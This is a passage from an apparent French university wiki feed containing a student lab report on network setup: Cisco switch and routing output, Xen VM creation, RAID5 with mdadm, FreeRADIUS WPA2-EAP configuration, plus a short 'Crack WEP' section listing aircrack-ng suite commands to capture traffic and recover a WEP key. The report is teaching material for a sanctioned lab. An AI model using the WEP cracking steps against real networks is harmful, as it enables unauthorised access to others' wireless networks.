 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 =====&lt;br /&gt;
&lt;br /&gt;
Même chose et même principe dans le VLAN d'interconnexion :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248      &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Ping_r1_r2.png&amp;diff=49084</id>
		<title>Fichier:Ping r1 r2.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Ping_r1_r2.png&amp;diff=49084"/>
				<updated>2018-12-21T14:48:10Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
